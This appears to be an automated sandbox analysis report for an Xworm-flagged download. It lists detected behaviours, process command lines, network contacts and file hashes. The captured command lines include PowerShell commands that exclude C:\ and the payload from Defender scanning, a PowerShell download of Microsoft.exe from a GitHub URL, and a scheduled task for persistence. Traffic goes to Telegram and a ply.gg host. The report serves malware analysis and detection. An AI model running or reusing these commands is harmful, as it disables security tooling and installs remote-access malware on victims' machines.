Analysis Overview
Threat Level: Known bad
The file https://gofile.io/d/erWKY2 was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Checks computer location settings
Drops startup file
Executes dropped EXE
Adds Run key to start application
Enumerates physical storage devices
Creates scheduled task(s)
Modifies registry class
Suspicious use of FindShellTrayWindow
NTFS ADS
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Runs net.exe
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 22:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 22:25
Reported
2024-05-26 22:30
Platform
win10v2004-20240426-en
Max time kernel
300s
Max time network
300s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Microsoft.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk | C:\Users\Admin\AppData\Local\Temp\$77.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk | C:\Users\Admin\AppData\Local\Temp\$77.exe | N/A |
Executes dropped EXE
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77 = "C:\\ProgramData\\$77" | C:\Users\Admin\AppData\Local\Temp\$77.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 956282.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/erWKY2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff92b3a46f8,0x7ff92b3a4708,0x7ff92b3a4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3448 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6016 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\W.bat" "
C:\Windows\system32\net.exe
NET FILE
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 FILE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Add-MpPreference -ExclusionPath 'C:\'"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/e1v1/W/releases/download/W/Microsoft.exe', 'C:\Users\Admin\AppData\Local\Temp\Microsoft.exe')"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$77.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\$77'
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2476 /prefetch:1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77" /tr "C:\ProgramData\$77"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
C:\ProgramData\$77
C:\ProgramData\$77
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5004 /prefetch:2
C:\ProgramData\$77
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.66.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store1.gofile.io | udp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| US | 8.8.8.8:53 | 227.123.112.45.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | authority-amazon.gl.at.ply.gg | udp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f53207a5ca2ef5c7e976cbb3cb26d870 |
| SHA1 | 49a8cc44f53da77bb3dfb36fc7676ed54675db43 |
| SHA256 | 19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23 |
| SHA512 | be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499 |
\??\pipe\LOCAL\crashpad_1460_EGGUVVXZFHGSRYRP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ae54e9db2e89f2c54da8cc0bfcbd26bd |
| SHA1 | a88af6c673609ecbc51a1a60dfbc8577830d2b5d |
| SHA256 | 5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af |
| SHA512 | e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 52208df084964b3f3f096b1d0b7124aa |
| SHA1 | 7974ee7a887e3e2fdb4969a5a31b2f2df12bb32a |
| SHA256 | bf6944d5f848a9acd90feacf9ff298ff5c2c1c21e454b6abcc99770f34edc16a |
| SHA512 | 618532b87efb60b4cbcd9b82b4316c71ce4332c97c2bae5ab5c9a47e421b6d89729d213582457a6ae0ab63f4f2bf7c6fb659943442f0ce45afc347c856fb6586 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\Unconfirmed 956282.crdownload
| MD5 | 5273c9f0a68605f043bacdf7a81faecf |
| SHA1 | ca9028398da6f88dafa157bf6b126e2bc8e48f13 |
| SHA256 | 06527a5d56ce163825bd94e07de31b8bc4e97c44dc006f060c63062fec2db168 |
| SHA512 | de4799845318d4f8902b1f1cdfb780382bd796b122acd975eaa7cfad971dba9628c3a7f5403455c5ca4f72cfe8cfbbbde3a68ab8e567f0349ffe9a2c4ff706bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 863ef0a62d09744f34e64f809023b982 |
| SHA1 | f34315d2e719d63f8abdacd93ac0e66be5f575e3 |
| SHA256 | f8979dcd6314cb31589d84c58b665facd6c83a1793bc7d9c68a606bcacd32689 |
| SHA512 | 3a74d7fb1f4e9512c772e67419bf0f433ba1149c1194fa65e40615ef210bebc7b95e01b7de8c79ae3c2529d3ec06de1542fa98562d7f43b75ea2f3e1db1d1c21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0411ad16bea649847357850fd470a9ec |
| SHA1 | 475dc19f67d047fd8e344cbe31c7b1f995b5c5ca |
| SHA256 | 83d55d906d5866995727fac7313c1c21846df83dfc7b72e11ec6d545431972da |
| SHA512 | 90422adf5729c313123b493447219aa3a552f6f7fb3b2b7fae10f168a461b8f64ffc16f067ad283b57cf79e8496c51bef43ccb42bb41202ab7728f39903cdf3c |
memory/5164-93-0x000001B984B50000-0x000001B984B72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t0ret4sz.5ub.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | eac98e72b261990fa9e900e1d6da3837 |
| SHA1 | 8b98be67638235c7fc28038773e8330fe8fb6d88 |
| SHA256 | 5edf511f2d0cbb631361fae9d202c728e1ee0c610e28098e145b97b75efaccb4 |
| SHA512 | b92814882e12be90395ffe51440e343c8bcc2f9b4600bc5ef7e8c12ffb88f973275d1a4f28f53e57f3abc19a48277d003d9002e9fa220a55a808aa394fa7ee78 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 14de68d7a317ad644b6ef887e0182491 |
| SHA1 | 1ff476a6c3fb9b006e873ba2482865cb9c6caed5 |
| SHA256 | bdf1006cd8b92cb88266fa7337f4473dfa40ee27f1ab0e3addab539ad3446783 |
| SHA512 | 9162b366ed2f17a20456938d3df16c9b7c79c9ff6b063a2cf344807138fc5fba41e9f8c7bc209634cf2ab8464b66c25c3480cd695a0936ce17eb840375831562 |
memory/5388-121-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-122-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-123-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-127-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-133-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-132-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-131-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-130-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-129-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-128-0x000002678E830000-0x000002678E831000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
| MD5 | 19aff7e3b7e3bce2bc35e60f72df0e85 |
| SHA1 | cf81454aa5cd0aad035275e64a71bf45b7cb261a |
| SHA256 | f0c875a630f2633efb93d5a66437c6f4894f2da6d5c7ec352115d686a199ce07 |
| SHA512 | 49b44e20099682b471ae0478c5db73d5b2e76aa1984b30fb95f7590cd636fcbe6dc4b41063882997dcd891ad96936cde56688783a92b07bbe637b6713f56eda0 |
memory/5844-157-0x00000000008B0000-0x00000000008E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77.exe
| MD5 | 6010709a7e1c771b74dbc2602af399f5 |
| SHA1 | b417a1d746ddfa7fe039a01bf6b87de60da335cc |
| SHA256 | 4352b9094b17df14a12af21dacc67d4b7661ca03f4b1492e847833ff3d77e4b5 |
| SHA512 | 26538ee5351ca5242b9bbb2bfc6cae661bb2e5c52204109d3cd880505ea618bb8bf248e8b15518ee499bc0c0e87a054ea97c78217b1e91a86c2e2c7348a28d1d |
memory/5968-171-0x0000000000DE0000-0x0000000000DF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 48f8b55d9610e3971015e6a2a586f2c5 |
| SHA1 | e33a511543f2a85d6076a84dedabf6fc5c9cf89d |
| SHA256 | fff1a83296dc31250f3e9c54b614c6f85fc44f3effc684173b826eb1b667c2dd |
| SHA512 | 5d9b1debeb1260738bb535d85eb7d4321a418b58e36ff658b3dcad564d6b6d8e1bc986efe024c01db8240e012a892627c3a976ecee15fb0d50418a9afa9730f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 316b8ffe7e5dc6add3a2b036e112e675 |
| SHA1 | 9351953aeb5cb6b82600d45e465872dd60dd2d5c |
| SHA256 | 4e419a44acbcda32a59b7b090e6a2e357a84cb78f1fa1f1be79a2ac4245d50ac |
